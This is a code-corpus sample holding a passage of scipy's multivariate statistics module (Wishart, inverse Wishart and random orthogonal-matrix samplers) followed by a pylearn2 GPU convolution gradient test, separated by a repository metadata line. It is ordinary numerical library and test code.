Returns
-------
var : float
The variance of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._var(dim, df, scale)
return _squeeze_output(out)
def _standard_rvs(self, n, shape, dim, df, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
random_state : np.random.RandomState instance
RandomState used for drawing the random variates.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
# Random normal variates for off-diagonal elements
n_tril = dim * (dim-1) // 2
covariances = random_state.normal(
size=n*n_tril).reshape(shape+(n_tril,))
# Random chi-square variates for diagonal elements
variances = np.r_[[random_state.chisquare(df-(i+1)+1, size=n)**0.5
for i in range(dim)]].reshape((dim,) + shape[::-1]).T
# Create the A matri(ces) - lower triangular
A = np.zeros(shape + (dim, dim))
# Input the covariances
size_idx = tuple([slice(None,None,None)]*len(shape))
tril_idx = np.tril_indices(dim, k=-1)
A[size_idx + tril_idx] = covariances
# Input the variances
diag_idx = np.diag_indices(dim)
A[size_idx + diag_idx] = variances
return A
def _rvs(self, n, shape, dim, df, C, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
C : ndarray
Cholesky factorization of the scale matrix, lower triangular.
%(_doc_random_state)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
random_state = self._get_random_state(random_state)
# Calculate the matrices A, which are actually lower triangular
# Cholesky factorizations of a matrix B such that B ~ W(df, I)
A = self._standard_rvs(n, shape, dim, df, random_state)
# Calculate SA = C A A' C', where SA ~ W(df, scale)
# Note: this is the product of a (lower) (lower) (lower)' (lower)'
# or, denoting B = AA', it is C B C' where C is the lower
# triangular Cholesky factorization of the scale matrix.
# this appears to conflict with the instructions in [1]_, which
# suggest that it should be D' B D where D is the lower
# triangular factorization of the scale matrix. However, it is
# meant to refer to the Bartlett (1933) representation of a
# Wishart random variate as L A A' L' where L is lower triangular
# so it appears that understanding D' to be upper triangular
# is either a typo in or misreading of [1]_.
for index in np.ndindex(shape):
CA = np.dot(C, A[index])
A[index] = np.dot(CA, CA.T)
return A
def rvs(self, df, scale, size=1, random_state=None):
"""
Draw random samples from a Wishart distribution.
Parameters
----------
%(_doc_default_callparams)s
size : integer or iterable of integers, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray
Random variates of shape (`size`,) + (`dim`, `dim`), where `dim` is
the dimension of the scale matrix.
Notes
-----
%(_doc_callparams_note)s
"""
n, shape = self._process_size(size)
dim, df, scale = self._process_parameters(df, scale)
# Cholesky decomposition of scale
C = scipy.linalg.cholesky(scale, lower=True)
out = self._rvs(n, shape, dim, df, C, random_state)
return _squeeze_output(out)
def _entropy(self, dim, df, log_det_scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
log_det_scale : float
Logarithm of the determinant of the scale matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'entropy' instead.
"""
return (
0.5 * (dim+1) * log_det_scale +
0.5 * dim * (dim+1) * _LOG_2 +
multigammaln(0.5*df, dim) -
0.5 * (df - dim - 1) * np.sum(
[psi(0.5*(df + 1 - (i+1))) for i in range(dim)]
) +
0.5 * df * dim
)
def entropy(self, df, scale):
"""
Compute the differential entropy of the Wishart.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the Wishart distribution
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
_, log_det_scale = self._cholesky_logdet(scale)
return self._entropy(dim, df, log_det_scale)
def _cholesky_logdet(self, scale):
"""
Compute the Cholesky decomposition and log(det(scale)).
Parameters
----------
scale : ndarray
Scale matrix.
Returns
-------
c_decomp : ndarray
The Cholesky decomposition of `scale`.
logdet : scalar
The log of the determinant of `scale`.
Notes
-----
This computation of ``logdet`` is equivalent to
``np.linalg.slogdet(scale)``. It is ~2x faster though.
"""
c_decomp = scipy.linalg.cholesky(scale, lower=True)
logdet = 2 * np.sum(np.log(c_decomp.diagonal()))
return c_decomp, logdet
wishart = wishart_gen()
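# Illustrative sketch (hypothetical helper): the comments in `_rvs` above
# describe the Bartlett (1933) construction S = C A A' C', where C is the
# lower Cholesky factor of the scale matrix and A is lower triangular with
# chi-distributed diagonal entries and standard normal entries below the
# diagonal.  The function below draws a single Wishart variate this way,
# assuming `scale` is a full 2-D symmetric positive definite matrix.
def _demo_wishart_bartlett_draw(df, scale, random_state=None):
    """Draw one Wishart variate via an explicit Bartlett construction (illustrative)."""
    random_state = check_random_state(random_state)
    scale = np.asarray(scale, dtype=float)
    dim = scale.shape[0]
    C = scipy.linalg.cholesky(scale, lower=True)
    A = np.zeros((dim, dim))
    A[np.diag_indices(dim)] = np.sqrt(
        [random_state.chisquare(df - i) for i in range(dim)])
    A[np.tril_indices(dim, k=-1)] = random_state.normal(
        size=dim * (dim - 1) // 2)
    CA = np.dot(C, A)
    return np.dot(CA, CA.T)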
class wishart_frozen(multi_rv_frozen):
"""
Create a frozen Wishart distribution.
Parameters
----------
df : array_like
Degrees of freedom of the distribution
scale : array_like
Scale matrix of the distribution
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
"""
def __init__(self, df, scale, seed=None):
self._dist = wishart_gen(seed)
self.dim, self.df, self.scale = self._dist._process_parameters(
df, scale)
self.C, self.log_det_scale = self._dist._cholesky_logdet(self.scale)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.dim, self.df, self.scale,
self.log_det_scale, self.C)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def mean(self):
out = self._dist._mean(self.dim, self.df, self.scale)
return _squeeze_output(out)
def mode(self):
out = self._dist._mode(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def var(self):
out = self._dist._var(self.dim, self.df, self.scale)
return _squeeze_output(out)
def rvs(self, size=1, random_state=None):
n, shape = self._dist._process_size(size)
out = self._dist._rvs(n, shape, self.dim, self.df,
self.C, random_state)
return _squeeze_output(out)
def entropy(self):
return self._dist._entropy(self.dim, self.df, self.log_det_scale)
# Set frozen generator docstrings from corresponding docstrings in
# Wishart and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'mean', 'mode', 'var', 'rvs', 'entropy']:
method = wishart_gen.__dict__[name]
method_frozen = wishart_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, wishart_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, wishart_docdict_params)
from numpy import asarray_chkfinite, asarray
from scipy.linalg.misc import LinAlgError
from scipy.linalg.lapack import get_lapack_funcs
def _cho_inv_batch(a, check_finite=True):
"""
Invert the matrices a_i, using a Cholesky factorization of A, where
a_i resides in the last two dimensions of a and the other indices describe
the index i.
Overwrites the data in a.
Parameters
----------
a : array
Array of matrices to invert, where the matrices themselves are stored
in the last two dimensions.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : array
Array of inverses of the matrices ``a_i``.
See also
--------
scipy.linalg.cholesky : Cholesky factorization of a matrix
"""
if check_finite:
a1 = asarray_chkfinite(a)
else:
a1 = asarray(a)
if len(a1.shape) < 2 or a1.shape[-2] != a1.shape[-1]:
raise ValueError('expected square matrix in last two dimensions')
potrf, potri = get_lapack_funcs(('potrf','potri'), (a1,))
tril_idx = np.tril_indices(a.shape[-2], k=-1)
triu_idx = np.triu_indices(a.shape[-2], k=1)
for index in np.ndindex(a1.shape[:-2]):
# Cholesky decomposition
a1[index], info = potrf(a1[index], lower=True, overwrite_a=False,
clean=False)
if info > 0:
raise LinAlgError("%d-th leading minor not positive definite"
% info)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal'
' potrf' % -info)
# Inversion
a1[index], info = potri(a1[index], lower=True, overwrite_c=False)
if info > 0:
raise LinAlgError("the inverse could not be computed")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal'
' potri' % -info)
# Make symmetric (dpotri only fills in the lower triangle)
a1[index][triu_idx] = a1[index][tril_idx]
return a1
class invwishart_gen(wishart_gen):
r"""
An inverse Wishart random variable.
The `df` keyword specifies the degrees of freedom. The `scale` keyword
specifies the scale matrix, which must be symmetric and positive definite.
In this context, the scale matrix is often interpreted in terms of a
multivariate normal covariance matrix.
Methods
-------
``pdf(x, df, scale)``
Probability density function.
``logpdf(x, df, scale)``
Log of the probability density function.
``rvs(df, scale, size=1, random_state=None)``
Draw random samples from an inverse Wishart distribution.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the degrees
of freedom and scale parameters, returning a "frozen" inverse Wishart
random variable:
rv = invwishart(df=1, scale=1)
- Frozen object with the same methods but holding the given
degrees of freedom and scale fixed.
See Also
--------
wishart
Notes
-----
%(_doc_callparams_note)s
The scale matrix `scale` must be a symmetric positive definite
matrix. Singular matrices, including the symmetric positive semi-definite
case, are not supported.
The inverse Wishart distribution is often denoted
.. math::
W_p^{-1}(\nu, \Psi)
where :math:`\nu` is the degrees of freedom and :math:`\Psi` is the
:math:`p \times p` scale matrix.
The probability density function for `invwishart` has support over positive
definite matrices :math:`S`; if :math:`S \sim W^{-1}_p(\nu, \Sigma)`,
then its PDF is given by:
.. math::
f(S) = \frac{|\Sigma|^\frac{\nu}{2}}{2^{ \frac{\nu p}{2} }
|S|^{\frac{\nu + p + 1}{2}} \Gamma_p \left(\frac{\nu}{2} \right)}
\exp\left( -tr(\Sigma S^{-1}) / 2 \right)
If :math:`S \sim W_p^{-1}(\nu, \Psi)` (inverse Wishart) then
:math:`S^{-1} \sim W_p(\nu, \Psi^{-1})` (Wishart).
If the scale matrix is 1-dimensional and equal to one, then the inverse
Wishart distribution :math:`W_1^{-1}(\nu, 1)` collapses to the
inverse Gamma distribution with parameters shape = :math:`\frac{\nu}{2}`
and scale = :math:`\frac{1}{2}`.
.. versionadded:: 0.16.0
References
----------
.. [1] M.L. Eaton, "Multivariate Statistics: A Vector Space Approach",
Wiley, 1983.
.. [2] M.C. Jones, "Generating Inverse Wishart Matrices", Communications in
Statistics - Simulation and Computation, vol. 14.2, pp.511-514, 1985.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import invwishart, invgamma
>>> x = np.linspace(0.01, 1, 100)
>>> iw = invwishart.pdf(x, df=6, scale=1)
>>> iw[:3]
array([ 1.20546865e-15, 5.42497807e-06, 4.45813929e-03])
>>> ig = invgamma.pdf(x, 6/2., scale=1./2)
>>> ig[:3]
array([ 1.20546865e-15, 5.42497807e-06, 4.45813929e-03])
>>> plt.plot(x, iw)
The input quantiles can be any shape of array, as long as the last
axis labels the components.
"""
def __init__(self, seed=None):
super(invwishart_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, wishart_docdict_params)
def __call__(self, df=None, scale=None, seed=None):
"""
Create a frozen inverse Wishart distribution.
See `invwishart_frozen` for more information.
"""
return invwishart_frozen(df, scale, seed)
def _logpdf(self, x, dim, df, scale, log_det_scale):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function.
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
log_det_scale : float
Logarithm of the determinant of the scale matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
log_det_x = np.zeros(x.shape[-1])
#scale_x_inv = np.zeros(x.shape)
x_inv = np.copy(x).T
if dim > 1:
_cho_inv_batch(x_inv) # works in-place
else:
x_inv = 1./x_inv
tr_scale_x_inv = np.zeros(x.shape[-1])
for i in range(x.shape[-1]):
C, lower = scipy.linalg.cho_factor(x[:,:,i], lower=True)
log_det_x[i] = 2 * np.sum(np.log(C.diagonal()))
#scale_x_inv[:,:,i] = scipy.linalg.cho_solve((C, True), scale).T
tr_scale_x_inv[i] = np.dot(scale, x_inv[i]).trace()
# Log PDF
out = ((0.5 * df * log_det_scale - 0.5 * tr_scale_x_inv) -
(0.5 * df * dim * _LOG_2 + 0.5 * (df + dim + 1) * log_det_x) -
multigammaln(0.5*df, dim))
return out
def logpdf(self, x, df, scale):
"""
Log of the inverse Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
x = self._process_quantiles(x, dim)
_, log_det_scale = self._cholesky_logdet(scale)
out = self._logpdf(x, dim, df, scale, log_det_scale)
return _squeeze_output(out)
def pdf(self, x, df, scale):
"""
Inverse Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
return np.exp(self.logpdf(x, df, scale))
def _mean(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mean' instead.
"""
if df > dim + 1:
out = scale / (df - dim - 1)
else:
out = None
return out
def mean(self, df, scale):
"""
Mean of the inverse Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix plus one.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mean : float or None
The mean of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mean(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _mode(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mode' instead.
"""
return scale / (df + dim + 1)
def mode(self, df, scale):
"""
Mode of the inverse Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mode : float
The Mode of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mode(dim, df, scale)
return _squeeze_output(out)
def _var(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'var' instead.
"""
if df > dim + 3:
var = (df - dim + 1) * scale**2
diag = scale.diagonal() # 1 x dim array
var += (df - dim - 1) * np.outer(diag, diag)
var /= (df - dim) * (df - dim - 1)**2 * (df - dim - 3)
else:
var = None
return var
def var(self, df, scale):
"""
Variance of the inverse Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix plus three.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
var : float
The variance of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._var(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _rvs(self, n, shape, dim, df, C, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
C : ndarray
Cholesky factorization of the scale matrix, lower triangular.
%(_doc_random_state)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
random_state = self._get_random_state(random_state)
# Get random draws A such that A ~ W(df, I)
A = super(invwishart_gen, self)._standard_rvs(n, shape, dim,
df, random_state)
# Calculate SA = (CA)'^{-1} (CA)^{-1} ~ iW(df, scale)
eye = np.eye(dim)
trtrs = get_lapack_funcs(('trtrs'), (A,))
for index in np.ndindex(A.shape[:-2]):
# Calculate CA
CA = np.dot(C, A[index])
# Get (C A)^{-1} via triangular solver
if dim > 1:
CA, info = trtrs(CA, eye, lower=True)
if info > 0:
raise LinAlgError("Singular matrix.")
if info < 0:
raise ValueError('Illegal value in %d-th argument of'
' internal trtrs' % -info)
else:
CA = 1. / CA
# Get SA
A[index] = np.dot(CA.T, CA)
return A
def rvs(self, df, scale, size=1, random_state=None):
"""
Draw random samples from an inverse Wishart distribution.
Parameters
----------
%(_doc_default_callparams)s
size : integer or iterable of integers, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray
Random variates of shape (`size`) + (`dim`, `dim`), where `dim` is
the dimension of the scale matrix.
Notes
-----
%(_doc_callparams_note)s
"""
n, shape = self._process_size(size)
dim, df, scale = self._process_parameters(df, scale)
# Invert the scale
eye = np.eye(dim)
L, lower = scipy.linalg.cho_factor(scale, lower=True)
inv_scale = scipy.linalg.cho_solve((L, lower), eye)
# Cholesky decomposition of inverted scale
C = scipy.linalg.cholesky(inv_scale, lower=True)
out = self._rvs(n, shape, dim, df, C, random_state)
return _squeeze_output(out)
def entropy(self):
# Need to find reference for inverse Wishart entropy
raise AttributeError
invwishart = invwishart_gen()
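# Added usage sketch (not part of the original source): basic use of the
# `invwishart` instance created above, with arbitrary parameter values.
#
#   >>> import numpy as np
#   >>> from scipy.stats import invwishart
#   >>> iw = invwishart(df=6, scale=np.eye(2))
#   >>> s = iw.rvs(size=5, random_state=0)              # shape (5, 2, 2)
#   >>> np.allclose(iw.mean(), np.eye(2) / (6 - 2 - 1))  # scale / (df - dim - 1)
#   True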
class invwishart_frozen(multi_rv_frozen):
def __init__(self, df, scale, seed=None):
"""
Create a frozen inverse Wishart distribution.
Parameters
----------
df : array_like
Degrees of freedom of the distribution
scale : array_like
Scale matrix of the distribution
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
"""
self._dist = invwishart_gen(seed)
self.dim, self.df, self.scale = self._dist._process_parameters(
df, scale
)
# Get the determinant via Cholesky factorization
C, lower = scipy.linalg.cho_factor(self.scale, lower=True)
self.log_det_scale = 2 * np.sum(np.log(C.diagonal()))
# Get the inverse using the Cholesky factorization
eye = np.eye(self.dim)
self.inv_scale = scipy.linalg.cho_solve((C, lower), eye)
# Get the Cholesky factorization of the inverse scale
self.C = scipy.linalg.cholesky(self.inv_scale, lower=True)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.dim, self.df, self.scale,
self.log_det_scale)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def mean(self):
out = self._dist._mean(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def mode(self):
out = self._dist._mode(self.dim, self.df, self.scale)
return _squeeze_output(out)
def var(self):
out = self._dist._var(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def rvs(self, size=1, random_state=None):
n, shape = self._dist._process_size(size)
out = self._dist._rvs(n, shape, self.dim, self.df,
self.C, random_state)
return _squeeze_output(out)
def entropy(self):
# Need to find reference for inverse Wishart entropy
raise AttributeError
# Set frozen generator docstrings from corresponding docstrings in
# inverse Wishart and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'mean', 'mode', 'var', 'rvs']:
method = invwishart_gen.__dict__[name]
method_frozen = wishart_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, wishart_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, wishart_docdict_params)
class special_ortho_group_gen(multi_rv_generic):
r"""
A matrix-valued SO(N) random variable.
Return a random rotation matrix, drawn from the Haar distribution
(the only uniform distribution on SO(n)).
The `dim` keyword specifies the dimension N.
Methods
-------
``rvs(dim=None, size=1, random_state=None)``
Draw random samples from SO(N).
Parameters
----------
dim : scalar
Dimension of matrices
Notes
-----
This class is wrapping the random_rot code from the MDP Toolkit,
https://github.com/mdp-toolkit/mdp-toolkit
Return a random rotation matrix, drawn from the Haar distribution
(the only uniform distribution on SO(n)).
The algorithm is described in the paper
Stewart, G.W., "The efficient generation of random orthogonal
matrices with an application to condition estimators", SIAM Journal
on Numerical Analysis, 17(3), pp. 403-409, 1980.
For more information see
http://en.wikipedia.org/wiki/Orthogonal_matrix#Randomization
See also the similar `ortho_group`.
Examples
--------
>>> from scipy.stats import special_ortho_group
>>> x = special_ortho_group.rvs(3)
>>> np.dot(x, x.T)
array([[ 1.00000000e+00, 1.13231364e-17, -2.86852790e-16],
[ 1.13231364e-17, 1.00000000e+00, -1.46845020e-16],
[ -2.86852790e-16, -1.46845020e-16, 1.00000000e+00]])
>>> import scipy.linalg
>>> scipy.linalg.det(x)
1.0
This generates one random matrix from SO(3). It is orthogonal and
has a determinant of 1.
"""
def __init__(self, seed=None):
super(special_ortho_group_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__)
def __call__(self, dim=None, seed=None):
"""
Create a frozen SO(N) distribution.
See `special_ortho_group_frozen` for more information.
"""
return special_ortho_group_frozen(dim, seed=seed)
def _process_parameters(self, dim):
"""
Dimension N must be specified; it cannot be inferred.
"""
if dim is None or not np.isscalar(dim) or dim <= 1 or dim != int(dim):
raise ValueError("""Dimension of rotation must be specified,
and must be a scalar greater than 1.""")
return dim
def rvs(self, dim, size=1, random_state=None):
"""
Draw random samples from SO(N).
Parameters
----------
dim : integer
Dimension of rotation space (N).
size : integer, optional
Number of samples to draw (default 1).
Returns
-------
rvs : ndarray or scalar
Random rotation matrices; array of dimension (size, dim, dim)
(or (dim, dim) if size == 1).
"""
size = int(size)
if size > 1:
return np.array([self.rvs(dim, size=1, random_state=random_state)
for i in range(size)])
dim = self._process_parameters(dim)
random_state = self._get_random_state(random_state)
H = np.eye(dim)
D = np.ones((dim,))
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
D[n-1] = np.sign(x[0])
x[0] -= D[n-1]*np.sqrt((x*x).sum())
# Householder transformation
Hx = (np.eye(dim-n+1)
- 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
# Fix the last sign such that the determinant is 1
D[-1] = (-1)**(1-(dim % 2))*D.prod()
# Equivalent to np.dot(np.diag(D), H) but faster, apparently
H = (D*H.T).T
return H
special_ortho_group = special_ortho_group_gen()
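# Added numerical sanity check (a sketch, not from the original file):
# matrices drawn from SO(N) should be orthogonal with determinant +1.
#
#   >>> import numpy as np
#   >>> from scipy.stats import special_ortho_group
#   >>> R = special_ortho_group.rvs(4, random_state=0)
#   >>> np.allclose(R.dot(R.T), np.eye(4))
#   True
#   >>> np.allclose(np.linalg.det(R), 1.0)
#   True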
class special_ortho_group_frozen(multi_rv_frozen):
def __init__(self, dim=None, seed=None):
"""
Create a frozen SO(N) distribution.
Parameters
----------
dim : scalar
Dimension of matrices
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
Examples
--------
>>> from scipy.stats import special_ortho_group
>>> g = special_ortho_group(5)
>>> x = g.rvs()
"""
self._dist = special_ortho_group_gen(seed)
self.dim = self._dist._process_parameters(dim)
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.dim, size, random_state)
class ortho_group_gen(multi_rv_generic):
r"""
A matrix-valued O(N) random variable.
Return a random orthogonal matrix, drawn from the O(N) Haar
distribution (the only uniform distribution on O(N)).
The `dim` keyword specifies the dimension N.
Methods
-------
``rvs(dim=None, size=1, random_state=None)``
Draw random samples from O(N).
Parameters
----------
dim : scalar
Dimension of matrices
Notes
-----
This class is closely related to `special_ortho_group`.
Some care is taken to avoid numerical error, as per the paper by Mezzadri.
References
----------
.. [1] F. Mezzadri, "How to generate random matrices from the classical
compact groups", arXiv:math-ph/0609050v2.
Examples
--------
>>> from scipy.stats import ortho_group
>>> x = ortho_group.rvs(3)
>>> np.dot(x, x.T)
array([[ 1.00000000e+00, 1.13231364e-17, -2.86852790e-16],
[ 1.13231364e-17, 1.00000000e+00, -1.46845020e-16],
[ -2.86852790e-16, -1.46845020e-16, 1.00000000e+00]])
>>> import scipy.linalg
>>> np.fabs(scipy.linalg.det(x))
1.0
This generates one random matrix from O(3). It is orthogonal and
has a determinant of +1 or -1.
"""
def __init__(self, seed=None):
super(ortho_group_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__)
def _process_parameters(self, dim):
"""
Dimension N must be specified; it cannot be inferred.
"""
if dim is None or not np.isscalar(dim) or dim <= 1 or dim != int(dim):
raise ValueError("Dimension of rotation must be specified,"
"and must be a scalar greater than 1.")
return dim
def rvs(self, dim, size=1, random_state=None):
"""
Draw random samples from O(N).
Parameters
----------
dim : integer
Dimension of rotation space (N).
size : integer, optional
Number of samples to draw (default 1).
Returns
-------
rvs : ndarray or scalar
Random orthogonal matrices; array of dimension (size, dim, dim)
(or (dim, dim) if size == 1).
"""
size = int(size)
if size > 1:
return np.array([self.rvs(dim, size=1, random_state=random_state)
for i in range(size)])
dim = self._process_parameters(dim)
random_state = self._get_random_state(random_state)
H = np.eye(dim)
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
# random sign, 50/50, but chosen carefully to avoid roundoff error
D = np.sign(x[0])
x[0] += D*np.sqrt((x*x).sum())
# Householder transformation
Hx = -D*(np.eye(dim-n+1)
- 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
return H
ortho_group = ortho_group_gen()
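# Added sketch (not part of the original file): O(N) draws are orthogonal
# but, unlike SO(N), the determinant may be either +1 or -1.
#
#   >>> import numpy as np
#   >>> from scipy.stats import ortho_group
#   >>> Q = ortho_group.rvs(3, random_state=0)
#   >>> np.allclose(Q.dot(Q.T), np.eye(3))
#   True
#   >>> np.isclose(abs(np.linalg.det(Q)), 1.0)
#   True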
| larsmans/scipy | scipy/stats/_multivariate.py | Python | bsd-3-clause | 92,794 |
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from pylearn2.testing.skip import skip_if_no_gpu
skip_if_no_gpu()
import numpy as np
from theano import shared
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
from pylearn2.sandbox.cuda_convnet.weight_acts import WeightActs
from theano.sandbox.cuda import gpu_from_host
from theano.sandbox.cuda import host_from_gpu
from theano.sandbox.rng_mrg import MRG_RandomStreams
import theano.tensor as T
from theano.tensor.nnet.conv import conv2d
from theano.tensor import as_tensor_variable
from theano import function
import warnings
def test_match_grad_valid_conv():
# Tests that weightActs is the gradient of FilterActs
# with respect to the weights.
for partial_sum in [0, 1, 4]:
rng = np.random.RandomState([2012,10,9])
batch_size = 3
rows = 7
cols = 9
channels = 8
filter_rows = 4
filter_cols = filter_rows
num_filters = 16
images = shared(rng.uniform(-1., 1., (channels, rows, cols,
batch_size)).astype('float32'), name='images')
filters = shared(rng.uniform(-1., 1., (channels, filter_rows,
filter_cols, num_filters)).astype('float32'), name='filters')
gpu_images = gpu_from_host(images)
gpu_filters = gpu_from_host(filters)
output = FilterActs(partial_sum=partial_sum)(gpu_images, gpu_filters)
output = host_from_gpu(output)
images_bc01 = images.dimshuffle(3,0,1,2)
filters_bc01 = filters.dimshuffle(3,0,1,2)
filters_bc01 = filters_bc01[:,:,::-1,::-1]
output_conv2d = conv2d(images_bc01, filters_bc01,
border_mode='valid')
output_conv2d = output_conv2d.dimshuffle(1,2,3,0)
theano_rng = MRG_RandomStreams(2013 + 1 + 31)
coeffs = theano_rng.normal(avg=0., std=1., size=output_conv2d.shape, dtype='float32')
cost_conv2d = (coeffs * output_conv2d).sum()
weights_grad_conv2d = T.grad(cost_conv2d, filters)
cost = (coeffs * output).sum()
hid_acts_grad = T.grad(cost, output)
weights_grad = WeightActs(partial_sum=partial_sum)(
gpu_images,
gpu_from_host(hid_acts_grad),
as_tensor_variable((4, 4))
)[0]
weights_grad = host_from_gpu(weights_grad)
f = function([], [output, output_conv2d, weights_grad, weights_grad_conv2d])
output, output_conv2d, weights_grad, weights_grad_conv2d = f()
if np.abs(output - output_conv2d).max() > 8e-6:
assert type(output) == type(output_conv2d)
assert output.dtype == output_conv2d.dtype
if output.shape != output_conv2d.shape:
print 'cuda-convnet shape: ',output.shape
print 'theano shape: ',output_conv2d.shape
assert False
err = np.abs(output - output_conv2d)
print 'absolute error range: ', (err.min(), err.max())
print 'mean absolute error: ', err.mean()
print 'cuda-convnet value range: ', (output.min(), output.max())
print 'theano value range: ', (output_conv2d.min(), output_conv2d.max())
assert False
warnings.warn("""test_match_grad_valid_conv success criterion is not very strict. Can we verify that this is OK?
One possibility is that theano is numerically unstable and Alex's code is better.
Probably theano CPU 64 bit is OK but it's worth checking the others.""")
if np.abs(weights_grad - weights_grad_conv2d).max() > 8.6e-6:
if type(weights_grad) != type(weights_grad_conv2d):
raise AssertionError("weights_grad is of type " + str(type(weights_grad)))
assert weights_grad.dtype == weights_grad_conv2d.dtype
if weights_grad.shape != weights_grad_conv2d.shape:
print 'cuda-convnet shape: ',weights_grad.shape
print 'theano shape: ',weights_grad_conv2d.shape
assert False
err = np.abs(weights_grad - weights_grad_conv2d)
print 'absolute error range: ', (err.min(), err.max())
print 'mean absolute error: ', err.mean()
print 'cuda-convnet value range: ', (weights_grad.min(), weights_grad.max())
print 'theano value range: ', (weights_grad_conv2d.min(), weights_grad_conv2d.max())
assert False
if __name__ == '__main__':
test_match_grad_valid_conv()
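# Added note (not part of the original test): the check above relies on
# Theano autodiff. A plain-numpy finite-difference version of the same idea,
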